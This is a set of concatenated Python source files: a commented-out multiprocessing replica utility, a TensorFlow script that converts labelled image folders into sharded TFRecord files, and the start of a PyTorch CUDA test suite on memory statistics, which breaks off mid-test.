# assert unique_init_kwargs is None
# self.obj = _replica_init(**replica_init_args)['obj']
#
# self.obj_type = obj_type
# self.collate = collate
# self._idx = None
# self.timeout = timeout
#
# def __len__(self):
# return self.replicas
#
# def _idx_execute(self, sel):
#
# if len(sel) == 0:
# return make_ghost(self.obj_type, self._execute)
#
# options = np.arange(self.replicas)
#
# idx = []
# for s in sel:
# new = options[s]
# try:
# idx.extend(new)
# except:
# idx.append(new)
#
# def execute_idx(fn=None, args=[], kwargs={}):
# return self._execute(fn, args, kwargs, idx=idx)
# return make_ghost(self.obj_type, execute_idx)
#
# def __call__(self, *sel):
# return self._idx_execute(sel)
#
# def __getitem__(self, sel):
# if isinstance(sel, (int, slice)):
# sel = [sel]
# return self._idx_execute(sel)
#
# def _execute(self, fn=None, args=[], kwargs={}, idx=None):
#
# shared_args = {
# 'args': args,
# 'kwargs': kwargs,
# 'fn': fn,
# }
#
# # dispatch job
# if self.replicas == 0:
# #print(fn, args, kwargs)
# return fn(self.obj, *args, **kwargs)
#
# in_queues = self.in_queues
# out_queues = self.out_queues
#
# if idx is not None:
# in_queues = in_queues[idx]
# out_queues = out_queues[idx]
#
# for in_q in in_queues:
# in_q.put((shared_args, {}))
#
# output = []
# for out_q in out_queues:
# output.append(out_q.get(timeout=self.timeout))
# if isinstance(output[-1], ExceptionWrapper):
# raise output.exc_type(output.exc_msg)
#
# # collate output
# if self.collate and isinstance(output[0], tuple):
# output = ([o[i] for o in output] for i in range(len(output[0])))
#
# return output
#
# class Parallelizer(Replicator): # see 'replicate' function below
# #def __init__(self, *args, **kwargs):
# # super(Parallelizer, self).__init__(*args, **kwargs)
#
# def _execute(self, fn=None, args=[], kwargs={}, idx=None):
#
# # dispatch job
# if self.replicas == 0:
# # print(fn, args, kwargs)
# return fn(self.obj, *args, **kwargs)
#
# in_queues = self.in_queues
# out_queues = self.out_queues
#
# if idx is not None:
# in_queues = in_queues[idx]
# out_queues = out_queues[idx]
#
# jlen = len(in_queues)
#
# if len(args) > 0:
# assert len(args[0]) == jlen
# args = zip(*args)
# else:
# args = [[]] * jlen
#
# if len(kwargs) > 0:
# # uncollate kwargs
# kwargs = [{k: v[i] for k, v in kwargs.items()} for i in range(jlen)]
# else:
# kwargs = [{}] * jlen
#
# for in_q, a, k in zip(in_queues, args, kwargs):
# in_q.put(({'args': a, 'kwargs': k, 'fn': fn}, {}))
#
# output = []
# for out_q in out_queues:
# output.append(out_q.get(timeout=self.timeout))
# if isinstance(output[-1], ExceptionWrapper):
# raise output.exc_type(output.exc_msg)
#
# # collate output
# if self.collate and isinstance(output[0], tuple):
# output = ([o[i] for o in output] for i in range(len(output[0])))
#
# return output
#
# def replicate(*args, separate_args=False, ghost=False, **kwargs):
# '''
# Creates replica objects for multiprocessing. Each process contains a unique instance of the same class ('obj_type').
#
# There are 2 types of managers: Replicators and Parallelizers (chosen using 'separate_args')
# Replicator - all replicas take the same arguments when called
# Parallelizer - each replica takes different arguments (passed in as a list)
#
# Subsets of replicas may be addressed by indexing or calling the manager. If 'ghost' is true a ghost object will be
# returned in addition to the manager; anything done to that object is applied to all replicas
#
# import time
# class Example:
# def f(self, i):
# time.sleep(0.5)
# print(i)
# return i+1
#
# replicator, ghost = replicate(Example, replicas=8, ghost=True)
#
# replicator(4).f(5) # executes f on replica 4
# replicator[0,2:6].f(5) # executes f on replicas 0 and 2:6
# replicator[0,0].f(5) # executes f on replica 0 twice
# replicator().f(5) # executes f on all replicas
# ghost.f(5) # executes f on all replicas
#
# # parallelizers have the same behavior except for each arg and kwarg a list the same length as the number of replicas to be executed must be passed in.
#
# :param args: for manager (check Replicator)
# :param separate_args: if true, then for each argument in the source function, a list of arguments must be passed one for each replica
# :param kwargs: for manager (check Replicator)
# :return: manager, replicas (essentially a voodoo doll)
# '''
#
# Manager = Parallelizer if separate_args else Replicator
#
# manager = Manager(*args, **kwargs)
#
# if not ghost:
# return manager
#
# replicas = make_ghost(manager.obj_type, manager._execute)
#
# return manager, replicas # anything done to the replicas object will be applied in parallel to all replicas, replicator holds info about replicas
#
#
# class Cloner(Farmer):
# '''
# executes any method in 'obj_type' N (default=num_workers) times with the same args using a pool of 'num_workers' workers
#
# unique init args can be passed to each worker, but args to all workers for each dispatch will be the same
#
# example:
#
# import time
# class Example:
# def f(self, i):
# time.sleep(0.5)
# print(i)
# return i+1
#
# clones = Cloner(Example, num_workers=4)
#
# out = clones(8).f(5)
# # takes about 1 sec and prints "5" 8 times
# # 'out' now contains [6, 6, 6, 6, 6, 6, 6, 6]
#
# '''
# def __init__(self, obj_type, default_N=None, init_args=[], init_kwargs={}, unique_worker_args=None,
# num_workers=0, collate=True, timeout=20):
#
# assert num_workers is not None or unique_worker_args is not None, 'must specify how many workers to use'
#
# if unique_worker_args is not None:
# unique_worker_args = [{'unique_init_kwargs': unique} for unique in unique_worker_args]
# num_workers = len(unique_worker_args)
#
# worker_init_args = {
# 'obj_type': obj_type,
# 'init_args': init_args,
# 'init_kwargs': init_kwargs,
# }
#
# super(Cloner, self).__init__(fn=_replica_run, init_fn=_replica_init,
# private_args=worker_init_args, unique_worker_args=unique_worker_args,
# num_workers=num_workers, auto_dispatch=False, timeout=timeout)
# self.default_N = max(num_workers, 1) if default_N is None else default_N
# self.obj_type = obj_type
# self.collate = collate
#
# #self.clones = make_ghost(self.obj_type, self._execute)
#
# def __call__(self, N=None):
# def execute_N(fn=None, args=[], kwargs={}):
# return self._execute(fn, args, kwargs, N)
# return make_ghost(self.obj_type, execute_N)
#
# def _execute(self, fn=None, args=[], kwargs={}, N=None): # execution should not change the state of the clone
#
# self.shared_args = {
# 'args': args,
# 'kwargs': kwargs,
# 'fn': fn,
# }
#
# if N is None:
# N = self.default_N
#
# # dispatch job
# self._dispatch(N)
#
# # collect responses
# output = [out for out in self]
#
# # collate output
# if self.collate and isinstance(output[0], tuple):
# output = ([o[i] for o in output] for i in range(len(output[0])))
#
# return output
|
build_image_data.py
|
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
"""
from datetime import datetime
import os
import random
import sys
import threading
import tensorflow as tf
import numpy as np
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('train_directory', './train',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', './val',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# dog
# cat
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', 'labels_file.txt', 'Labels file')
def _create_labels_file(data_dir):
"""Reads addresses and labels from `data_dir`.
The `tf.gfile.Glob` module return a list of paths matching a pathname pattern
Args:
data_dir = Path to the `input image folder`.
Returns:
matching_files: list, address of each picture in the train folder.
class_labels: list, 0 = Cat, 1 = Dog.
class_text: list, unique labels
"""
jpeg_file_path = f'{data_dir}/*.jpg'
matching_files = tf.gfile.Glob(jpeg_file_path)
class_text = ['cat' if 'cat' in addr else 'dog' for addr in matching_files]
# Write labels_file
output = []
for x in class_text:
if x not in output:
output.append(x)
with open('labels_file.txt', 'w') as writer:
for unique_label_text in output:
writer.write(f'{unique_label_text}\n')
return None
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/image0.JPEG
data_dir/dog/image1.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth label.
"""
print(f'Determining list of input files and labels from {data_dir}.')
unique_labels = [l.strip() for l in tf.gfile.GFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = f'{data_dir}/{text}/*'
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(unique_labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
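# Example of the returned structure (a sketch, not part of the original script):
# for a data_dir with 'cat' and 'dog' sub-folders, the three lists are parallel,
# e.g. filenames[i] = 'data_dir/dog/x.jpg', texts[i] = 'dog', labels[i] = 2 when
# 'dog' is the second line of the labels file; ordering is shuffled with a fixed
# seed so repeated runs produce the same order.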
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(
image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(
self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
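# Usage sketch for ImageCoder (illustrative only; _process_image below is the
# real call site):
#   coder = ImageCoder()
#   rgb = coder.decode_jpeg(tf.gfile.GFile('/path/to/image.jpg', 'rb').read())
#   # rgb is a uint8 numpy array of shape (height, width, 3)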
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g. '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding preprocessing.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.GFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g. 'path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(
features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
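# A minimal sketch (not part of the original converter) of how a serialized Example
# written by _convert_to_example() could be parsed back using the same TF 1.x API
# this script relies on. The name _parse_example_sketch and the choice of parsed
# fields are illustrative; nothing in this script calls it.
def _parse_example_sketch(serialized_example):
    feature_map = {
        'image/encoded': tf.FixedLenFeature([], tf.string, default_value=''),
        'image/class/label': tf.FixedLenFeature([], tf.int64, default_value=-1),
        'image/class/text': tf.FixedLenFeature([], tf.string, default_value=''),
        'image/height': tf.FixedLenFeature([], tf.int64, default_value=0),
        'image/width': tf.FixedLenFeature([], tf.int64, default_value=0),
    }
    features = tf.parse_single_example(serialized_example, feature_map)
    # Decode the JPEG bytes back into an HxWx3 uint8 tensor.
    image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
    return image, features['image/class/label'], features['image/class/text']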
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding preprocessing.
thread_index: integer, unique batch index within [0, len(ranges)).
ranges: list of pairs of integers specifying the range of files each batch
should analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128 and num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
with tf.python_io.TFRecordWriter(output_file) as writer:
shard_counter = 0
files_in_shard = np.arange(
shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(
filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' %
filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
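# Worked example of the sharding above (a sketch, assuming the flag defaults):
# with num_threads = 2 and train_shards = 2, num_shards_per_batch is 1, so thread 0
# writes 'train-00000-of-00002' and thread 1 writes 'train-00001-of-00002', each
# covering half of the shuffled file list.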
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches, where batch i covers the files in
# [ranges[i][0], ranges[i][1]).
spacing = np.linspace(
0, len(filenames), FLAGS.num_threads + 1).astype(int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' %
(FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
# assert not FLAGS.validation_shards % FLAGS.num_threads, (
# 'Please make the FLAGS.num_threads commensurate with '
# 'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
# _process_dataset('validation', FLAGS.validation_directory,
# FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
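# Example invocation (a sketch; 'build_image_data.py' is a placeholder name for
# this script, and the labels file must already list one class per line):
#   python build_image_data.py --train_directory=./train --output_directory=/tmp/ \
#       --train_shards=2 --num_threads=2 --labels_file=labels_file.txt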
|
test_cuda.py
|
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause a CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
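# The capability flags above gate tests by available resources: TEST_LARGE_TENSOR
# requires at least 12 GB of GPU memory, TEST_MEDIUM_TENSOR at least 6 GB, and
# TEST_CUDNN / TEST_BF16 check for cuDNN and bfloat16 support respectively.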
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
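# make_sparse_tensor builds a sparse tensor of type `t` with `n` randomly placed
# values over a dense shape `sizes`; indices are drawn independently per dimension,
# so duplicate coordinates are possible.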
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
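# get_cycles_per_ms is used throughout these tests in the pattern
# torch.cuda._sleep(int(N * get_cycles_per_ms())), which keeps the GPU busy for
# roughly N milliseconds so that asynchronous behaviour can be observed reliably.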
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying the cache may happen (due to allocation or empty_cache), so
# we can't assert new_r >= last_r
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with an end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
